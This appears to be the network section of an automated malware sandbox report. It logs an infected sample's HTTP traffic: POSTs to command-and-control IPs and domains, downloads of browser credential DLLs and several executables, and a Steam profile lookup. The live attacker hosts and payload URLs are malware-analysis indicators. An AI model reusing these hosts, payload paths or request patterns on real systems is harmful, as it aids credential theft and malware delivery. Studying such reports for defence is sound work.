                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IIEBGIDAAFHIJJJJEGCGUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HCBAKJEHDBGHIEBGCGDGUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CGHDAKKJJJKJKECBGCGDUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 332Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KEBFHIJECFIDGDGCGHCGUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 5645Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /sqls.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EBGCFBGCBFHJECBGDAKKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 4677Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DGIJEGHDAECAKECAFCAKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 1529Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AKECBFBAEBKJJJJKFCGCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JKJDBAAAEHIEGCAKFHCGUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GIEHJDHCBAEHJJJKKFIDUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 1145Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KEBFHIJECFIDGDGCGHCGUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DAAFBAKECAEGCBFIEGDGUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IJDGCAEBFIIECAKFHIJEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IDAEHCFHJJJJECAAFBKJUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 453Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AFCBAEBAEBFHCAKFCAKEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 129229Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EHJKJDGCGDAKFHIDBGCBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xdtlvnnwnlpkuygk.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 125Host: dbfhns.in
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ytvhsyvyrbixtfi.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 239Host: dbfhns.in
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://txpgggtypbkripei.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 309Host: dbfhns.in
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nwyllkfdfrdb.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 181Host: dbfhns.in
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jpbahollcwbghe.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 118Host: dbfhns.in
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://oygcwhbcxoopv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 278Host: dbfhns.in
                Source: global trafficHTTP traffic detected: GET /file/update.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 45.129.96.86
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fjtoifbsexibjqos.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 220Host: dbfhns.in
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://eaiecpphhehnp.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 237Host: dbfhns.in
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ohbpdxbbqxsqjiv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 190Host: dbfhns.in
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://thknwrjryktui.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 280Host: dbfhns.in
                Source: global trafficHTTP traffic detected: GET /pintxi1lv.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 23.145.40.124
                Source: global trafficHTTP traffic detected: GET /file/host_so.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.235.137.54
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mrnhbbwrygn.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 228Host: dbfhns.in
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uhruuiuofju.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 236Host: dbfhns.in
                Source: global trafficHTTP traffic detected: GET /sdf34ert3etgrthrthfghfghjfgh.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 91.202.233.231
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gdrusktiywhw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 181Host: dbfhns.in
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dswkxseehrq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 278Host: dbfhns.in
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://etlthdykpik.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 218Host: dbfhns.in
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://urrnadxnpwvv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 124Host: dbfhns.in
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hnoddeyuysdltft.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 131Host: dbfhns.in
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://djnjnheylgenw.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 368Host: dbfhns.in
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mvirbkubtmy.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 319Host: dbfhns.in
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ukxbtouqvjwpgrb.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 188Host: dbfhns.in
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lttuitxyemp.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 159Host: dbfhns.in
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://haljhouhmvighpi.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 159Host: dbfhns.in
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bkjyrxsoflynogyv.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 249Host: dbfhns.in
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://iymhuqeqmdev.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 127Host: dbfhns.in
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rscrbtwfrpl.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 350Host: dbfhns.in
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://feebaxojoajqvghx.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 325Host: dbfhns.in
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://flowliaawjqccjvx.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 336Host: dbfhns.in
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dnklpspcfvmivsa.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 239Host: dbfhns.in
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://juuhlbwtemhw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 280Host: dbfhns.in
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uipcoqrcfmpaso.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 339Host: dbfhns.in
                Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CFACC60 PR_Recv,9_2_6CFACC60
                Source: global trafficHTTP traffic detected: GET /profiles/76561199689717899 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /sqls.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /file/update.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 45.129.96.86
                Source: global trafficHTTP traffic detected: GET /pintxi1lv.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 23.145.40.124
                Source: global trafficHTTP traffic detected: GET /file/host_so.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.235.137.54
                Source: global trafficHTTP traffic detected: GET /sdf34ert3etgrthrthfghfghjfgh.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 91.202.233.231
                Source: kat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                Source: global trafficDNS traffic detected: DNS query: dbfhns.in
                Source: global trafficDNS traffic detected: DNS query: whispedwoodmoodsksl.shop
                Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
                Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: whispedwoodmoodsksl.shop
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:22:24 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 04 00 00 00 72 e8 85 ec Data Ascii: r
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:22:25 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
